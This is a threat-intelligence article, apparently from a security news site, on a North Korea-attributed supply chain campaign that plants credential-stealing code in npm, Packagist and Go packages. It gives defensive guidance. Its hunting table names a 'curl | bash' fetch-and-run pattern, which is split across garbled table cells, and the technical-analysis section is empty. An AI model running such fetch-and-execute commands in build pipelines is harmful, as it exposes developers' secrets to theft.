North Korea's 'PolinRider' Supply Chain Campaign Expands with 108 New Malicious Packages

North Korean Hackers Escalate 'PolinRider' Supply Chain Attack on Devs

HIGH
July 4, 2026
6m read
Supply Chain AttackThreat ActorCloud Security

Related Entities

Threat Actors

Contagious InterviewFamous Chollima

Organizations

Socket

Products & Tech

npmPackagistGoKubernetes

Full Report

Executive Summary

North Korea-aligned threat actors, tracked as Contagious Interview (or Famous Chollima), are significantly expanding a sophisticated software supply chain campaign known as PolinRider. According to security firm Socket, the group has published 108 unique malicious packages and browser extensions across the npm, Packagist (PHP), and Go open-source ecosystems. The campaign's objective is to compromise developer accounts and infiltrate enterprise CI/CD pipelines to steal credentials and propagate further attacks. This escalation highlights the persistent and evolving threat that state-sponsored actors pose to the integrity of the open-source software supply chain.

Threat Overview

The PolinRider campaign is a multi-stage supply chain attack targeting software developers.

  • Threat Actor: Attributed to the North Korean group "Contagious Interview" / "Famous Chollima."
  • Initial Access: The group uses social engineering, often with fake job offers, to compromise the accounts of legitimate open-source package maintainers.
  • Tactic: Once they have control of a maintainer's account, they inject malicious code into new versions of popular packages. Unsuspecting developers then pull these trojanized updates into their own projects.
  • Affected Repositories: The campaign has targeted multiple ecosystems, including npm (JavaScript), Packagist (PHP), and Go modules, as well as at least one Chrome extension.
  • Payload: The malicious code is designed to activate within the developer's environment or, more critically, within an organization's CI/CD pipeline. Its primary function is to steal sensitive credentials, such as Kubernetes access tokens, API keys, and other secrets.

Technical Analysis

This campaign is a classic example of exploiting trust in the open-source ecosystem.

Impact Assessment

The PolinRider campaign poses a severe threat to organizations that rely on open-source software.

  • Widespread Compromise: A single compromised package can lead to the breach of hundreds or thousands of downstream projects and companies.
  • High-Privilege Access: CI/CD pipelines often have high-level privileges and access to production secrets. A compromise here can lead to a full takeover of cloud infrastructure.
  • Stealth and Persistence: Attacks originating from a trusted, internal build process are extremely difficult to detect.
  • Brand Damage: An organization whose software is found to contain malicious code from a supply chain attack will suffer immense reputational damage.

IOCs — Directly from Articles

No specific package names, domains, or other IOCs were provided in the source articles.

Cyber Observables — Hunting Hints

Detecting this activity requires vigilance over the software development lifecycle. The following patterns could indicate related activity:

Type
Log Source
Value
CI/CD build logs
Description
Look for build steps that make unexpected outbound network connections, especially from package installation scripts.
Type
File Path
Value
package.json, composer.json, go.mod
Description
Monitor for dependencies being updated to new versions that have been published very recently or by an unfamiliar maintainer.
Type
Command Line Pattern
Value
`curl
Description
bash`
Type
Network Traffic Pattern
Value
DNS queries to suspicious domains from build agents
Description
Monitor for connections to domains that are not known package registries or code repositories.

Detection & Response

  1. Dependency Scanning: Use advanced software composition analysis (SCA) tools that perform behavioral analysis on packages during installation in a sandbox to detect malicious activity (e.g., network connections, file system access). This is a form of D3FEND's Dynamic Analysis (D3-DA).
  2. CI/CD Monitoring: Monitor the behavior of your build runners. Alert on anomalous network connections, process executions, and file access patterns.
  3. Code Provenance: Use tools and services that verify the provenance of open-source packages, such as checking for changes in maintainer accounts or unusual publishing patterns.

Mitigation

  1. Vet Dependencies: Do not blindly trust open-source packages. Pin dependencies to specific, known-good versions. Before updating, review the changes and the reputation of the contributor. This is a form of Executable Allowlisting (D3-EAL).
  2. Least-Privilege CI/CD: Ensure that build jobs run with the minimum necessary permissions. Use ephemeral, short-lived credentials for each build instead of long-lived secrets.
  3. Network Egress Filtering: Tightly restrict outbound network access from your CI/CD environment. Only allow connections to known, trusted repositories. This is a crucial Outbound Traffic Filtering (D3-OTF) control.
  4. Maintainer Account Security: For those who maintain open-source packages, enforce MFA on all accounts (GitHub, npm, etc.) and be vigilant for social engineering attempts. This is a direct application of Multi-factor Authentication (M1032).

Timeline of Events

1
July 4, 2026
This article was published

MITRE ATT&CK Mitigations

Enforcing MFA on developer accounts for package registries and version control systems is critical to prevent account takeover.

Strict egress filtering on CI/CD runners can block the exfiltration of stolen credentials.

Audit

M1047enterprise

Auditing and analyzing dependencies before ingestion can help identify malicious or suspicious packages.

Article Author

Jason Gomes

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & AnalysisSecurity Orchestration (SOAR/XSOAR)Incident Response & Digital ForensicsSecurity Operations Center (SOC)SIEM & Security AnalyticsCyber Fusion & Threat SharingSecurity Automation & IntegrationManaged Detection & Response (MDR)

Tags

Supply Chain AttackNorth KoreaPolinRiderContagious InterviewnpmPackagistGoCI/CD

📢 Share This Article

Help others stay informed about cybersecurity threats

🎯 MITRE ATT&CK Mapped

Every tactic, technique, and sub-technique used in this threat has been identified and mapped to the MITRE ATT&CK framework for consistent, actionable threat language.

🧠 Enriched & Analyzed

Observables and indicators of compromise (IOCs) have been extracted and cataloged. Risk has been assessed and correlated with known threat actors and historical campaigns.

🛡️ Actionable Guidance

Detection rules, incident response steps, and D3FEND-aligned mitigation strategies are included so your team can act on this intelligence immediately.

🔗 STIX Visualizer

Structured threat data is packaged as a STIX 2.1 bundle and can be visualized as an interactive graph — relationships between actors, malware, techniques, and indicators.

Sigma Generator

Sigma detection rules are derived from the threat techniques in this article and can be converted for deployment across any major SIEM or EDR platform.